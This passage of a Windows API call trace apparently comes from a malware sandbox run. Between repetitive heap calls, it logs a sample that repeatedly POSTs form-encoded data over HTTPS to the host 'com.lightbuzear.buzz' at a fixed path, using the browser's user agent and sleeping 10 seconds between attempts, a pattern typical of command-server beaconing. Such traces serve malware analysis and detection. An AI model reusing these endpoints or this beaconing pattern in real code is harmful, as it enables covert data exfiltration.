hHeap=0x4780000) returned 1 [0261.335] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815c98 [0261.336] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815a40 | out: hHeap=0x4780000) returned 1 [0261.336] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0261.336] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c98 | out: hHeap=0x4780000) returned 1 [0261.336] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815c98 [0261.336] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800870 [0261.336] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800870 | out: hHeap=0x4780000) returned 1 [0261.336] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0261.336] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0261.336] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce680 [0261.336] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5f0 [0261.336] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0261.336] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce710 [0261.336] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0261.336] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5b0 [0261.337] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0261.337] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce750 [0261.337] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0261.337] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47ba710 [0261.337] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0261.337] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f4888 [0261.337] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ba710 | out: hHeap=0x4780000) returned 1 [0261.337] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0261.337] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4888 | out: hHeap=0x4780000) returned 1 [0261.337] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48008e8 [0261.337] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0261.337] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0261.337] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48008e8 | out: hHeap=0x4780000) returned 1 [0261.337] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48007f8 [0261.337] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb898 [0261.337] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800898 [0261.337] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb898 | out: hHeap=0x4780000) returned 1 [0261.338] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0261.338] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0261.338] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0261.338] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800898 | out: hHeap=0x4780000) returned 1 [0261.339] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5b0 [0261.339] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce750 [0261.339] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0261.339] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce610 [0261.339] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0261.339] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce640 [0261.339] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0261.339] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0261.339] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0261.339] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f4720 [0261.339] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0261.339] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f4888 [0261.339] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4720 | out: hHeap=0x4780000) returned 1 [0261.339] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0261.347] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4888 | out: hHeap=0x4780000) returned 1 [0261.347] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48007d0 [0261.347] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0261.347] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0261.347] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48007d0 | out: hHeap=0x4780000) returned 1 [0261.347] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800960 [0261.347] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb898 [0261.347] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48007d0 [0261.348] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb898 | out: hHeap=0x4780000) returned 1 [0261.348] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0261.348] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0261.348] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0262.650] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48007d0 | out: hHeap=0x4780000) returned 1 [0262.650] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce690 [0262.650] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6d0 [0262.651] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0262.651] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6f0 [0262.651] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce670 [0262.654] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0262.654] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0262.654] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0262.654] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0262.654] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0262.654] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5e0 [0262.654] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0262.654] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47ba710 [0262.654] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0262.654] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815638 [0262.654] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ba710 | out: hHeap=0x4780000) returned 1 [0262.654] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0262.654] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815638 | out: hHeap=0x4780000) returned 1 [0262.654] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48007d0 [0262.654] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0262.654] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba58 [0262.654] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48007d0 | out: hHeap=0x4780000) returned 1 [0262.654] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800640 [0262.655] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb940 [0262.655] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48009d8 [0262.655] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb940 | out: hHeap=0x4780000) returned 1 [0262.655] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba58 | out: hHeap=0x4780000) returned 1 [0262.656] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0262.656] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0262.656] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48009d8 | out: hHeap=0x4780000) returned 1 [0262.657] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0262.657] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0262.657] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce740 [0262.657] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0262.657] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5b0 [0262.657] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0262.657] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0262.657] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0262.657] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5b0 [0262.657] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0262.657] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815638 [0262.657] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0262.657] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47ba710 [0262.657] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815638 | out: hHeap=0x4780000) returned 1 [0262.657] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0262.657] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ba710 | out: hHeap=0x4780000) returned 1 [0262.657] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800668 [0262.657] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0262.657] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe48 [0262.657] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800668 | out: hHeap=0x4780000) returned 1 [0262.657] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48006e0 [0262.657] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe80 [0262.658] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800a00 [0262.658] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe80 | out: hHeap=0x4780000) returned 1 [0262.658] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0262.658] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0262.658] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0262.659] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800a00 | out: hHeap=0x4780000) returned 1 [0262.659] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0262.659] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0262.659] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0262.659] FreeLibrary (hLibModule=0x71570000) returned 1 [0262.659] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0262.659] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0262.660] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48005a0 | out: hHeap=0x4780000) returned 1 [0262.660] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800280 | out: hHeap=0x4780000) returned 1 [0262.660] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800230 | out: hHeap=0x4780000) returned 1 [0262.660] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800f28 | out: hHeap=0x4780000) returned 1 [0262.661] Sleep (dwMilliseconds=0x2710) [0262.695] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce620 [0262.695] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce600 [0262.696] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0262.696] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5b0 [0262.696] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0262.696] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0262.696] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0262.696] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce730 [0262.696] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0262.696] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47ba3e0 [0262.696] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0262.696] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47ba710 [0262.696] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ba3e0 | out: hHeap=0x4780000) returned 1 [0262.696] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0262.696] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ba710 | out: hHeap=0x4780000) returned 1 [0262.696] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x47ba710 [0262.696] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800f28 [0262.697] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800f28 | out: hHeap=0x4780000) returned 1 [0262.697] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0262.697] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800f28 [0262.697] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0262.698] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6a0 [0262.700] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce570 [0262.700] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0262.700] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6b0 [0262.700] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0262.700] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6d0 [0262.701] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0262.701] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6b0 [0262.701] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0262.701] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47ba3e0 [0262.701] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0262.701] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815c50 [0262.701] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ba3e0 | out: hHeap=0x4780000) returned 1 [0262.701] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0262.701] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c50 | out: hHeap=0x4780000) returned 1 [0262.701] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800230 [0262.701] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0262.701] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0262.701] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800230 | out: hHeap=0x4780000) returned 1 [0262.701] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800230 [0262.701] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0262.701] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800280 [0262.702] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0262.702] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0262.702] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0262.702] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0262.702] FreeLibrary (hLibModule=0x71780000) returned 1 [0262.703] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800280 | out: hHeap=0x4780000) returned 1 [0262.703] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0262.703] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800280 [0262.703] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0262.703] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce740 [0262.703] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce730 [0262.703] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0262.703] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6c0 [0262.703] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0262.703] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0262.703] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0262.703] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0262.703] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0262.703] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815638 [0262.703] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0262.704] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815a40 [0262.704] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815638 | out: hHeap=0x4780000) returned 1 [0262.704] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0262.704] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815a40 | out: hHeap=0x4780000) returned 1 [0262.704] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815a40 [0262.704] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800708 [0262.704] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800708 | out: hHeap=0x4780000) returned 1 [0262.704] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0262.704] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800988 [0262.704] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0262.704] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800780 [0262.705] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce600 [0262.705] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0262.705] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0262.705] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce750 [0262.705] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0262.705] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6b0 [0262.705] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0262.705] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce610 [0262.705] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0262.705] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815638 [0262.705] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0262.705] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47ba3e0 [0262.705] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815638 | out: hHeap=0x4780000) returned 1 [0262.705] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0262.705] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ba3e0 | out: hHeap=0x4780000) returned 1 [0262.705] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x47ba3e0 [0262.705] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48008c0 [0262.706] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48008c0 | out: hHeap=0x4780000) returned 1 [0262.706] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0262.706] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0262.706] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0262.706] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6a0 [0262.706] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0262.706] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0262.706] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0262.706] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0262.706] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0262.706] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5e0 [0262.706] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0262.707] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f808 [0262.707] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0262.707] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ec28 [0262.707] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f808 | out: hHeap=0x4780000) returned 1 [0262.707] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0262.707] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ec28 | out: hHeap=0x4780000) returned 1 [0262.707] RtlAllocateHeap 